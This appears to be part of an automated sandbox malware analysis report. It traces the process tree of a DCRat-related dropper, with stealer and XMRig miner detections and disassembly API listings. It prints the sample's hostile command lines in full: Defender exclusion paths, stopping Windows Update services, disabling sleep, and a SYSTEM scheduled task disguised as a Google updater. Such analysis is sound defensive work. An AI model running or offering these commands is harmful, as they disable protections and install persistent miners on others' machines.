Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:25:55
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Imagebase:	0x70000
File size:	1'899'637 bytes
MD5 hash:	95AB7F1022401E488C0C50E6E5E8937F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2396018621.000000000538E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 51%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:25:55
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff63c0a0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:25:55
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:25:56
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\launcher.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\launcher.exe"
Imagebase:	0x7ff77e080000
File size:	262'656 bytes
MD5 hash:	158FAFA10D2218AA47999131194736F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:25:56
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:25:56
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c pause
Imagebase:	0x7ff6f7790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:25:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe"
Imagebase:	0xea0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff6f7790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:26:01
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6f7790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff60c240000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff63c0a0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6a26d0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7e0d40000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	10:26:02
Start date:	10/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff704000000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:26:03
Start date:	10/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6a26d0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:26:03
Start date:	10/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6a26d0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:26:03
Start date:	10/01/2025
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff621f20000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	10:26:04
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:26:05
Start date:	10/01/2025
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff73dc70000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	10:26:09
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	10:26:09
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	10:26:09
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	10:26:09
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	10:26:10
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	10:26:11
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	10:26:12
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	10:26:12
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	10:26:12
Start date:	10/01/2025
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x7ff695710000
File size:	6'008'408 bytes
MD5 hash:	8E222E8F9A186F8D21BF2895E1946853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:26:13
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff63c0a0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:26:13
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:26:15
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	10:26:16
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	10:26:16
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff6f7790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:26:16
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:26:16
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:26:17
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:26:17
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:26:17
Start date:	10/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff666d30000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:26:17
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7d3e90000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	83.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401AE1 Relevance: 6.0, APIs: 4, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 00401AE1
GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
GetProcessHeap.KERNEL32(00000000), ref: 00401AF7

Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED

ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18

Memory Dump Source

Source File: 00000000.00000002.2389289887.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2388920289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2390423541.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2391835307.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2391835307.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392004527.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2401880976.0000000000B3F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_launcher.jbxd

Similarity

API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
String ID:
API String ID: 673778540-0
Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

Function 00401000 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 67
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00403000,000001F4), ref: 0040104C
LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
RegisterClassExA.USER32(00000030), ref: 0040106E
CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
ShowWindow.USER32(00000001,?), ref: 004010BC
UpdateWindow.USER32(00000001), ref: 004010C7
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
TranslateMessage.USER32(?), ref: 004010E4
DispatchMessageA.USER32(?), ref: 004010ED

Strings

WinClass32, xrefs: 0040103D, 0040109E, 004010A3
0, xrefs: 00401006

Memory Dump Source

Source File: 00000000.00000002.2389289887.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2388920289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2390423541.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2391835307.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2391835307.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392004527.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2401880976.0000000000B3F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_launcher.jbxd

Similarity

API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
String ID: 0$WinClass32
API String ID: 282685165-2329282442
Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

Analysis Process: hs.exePID: 6768, Parent PID: 6688COMMON

Executed Functions

Function 00007FF7C3F614B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2552046478.00007FF7C3F61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C3F60000, based on PE: true

Associated: 00000002.00000002.2551794383.00007FF7C3F60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2552702619.00007FF7C3F7C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2552838686.00007FF7C3FA1000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2556363709.00007FF7C4510000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2556439807.00007FF7C4512000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2556532646.00007FF7C451D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2556659260.00007FF7C4520000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2556765096.00007FF7C4521000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c3f60000_hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf726dedd82592c2f9673cca0d9f3d3d311fa26f81a1586df7e6b978fa3723b4
Instruction ID: 8aee7cad1548464c11eaa29f510f45360c0948294450e296c61ff4e442d0d97e
Opcode Fuzzy Hash: cf726dedd82592c2f9673cca0d9f3d3d311fa26f81a1586df7e6b978fa3723b4
Instruction Fuzzy Hash: D0B0123094660985E3403F02E8C13587230BB047A1FC05432C40C13352CE7C50804770

Analysis Process: DCRatBuild.exePID: 6780, Parent PID: 6688COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.2%
Total number of Nodes:	1499
Total number of Limit Nodes:	45

Executed Functions

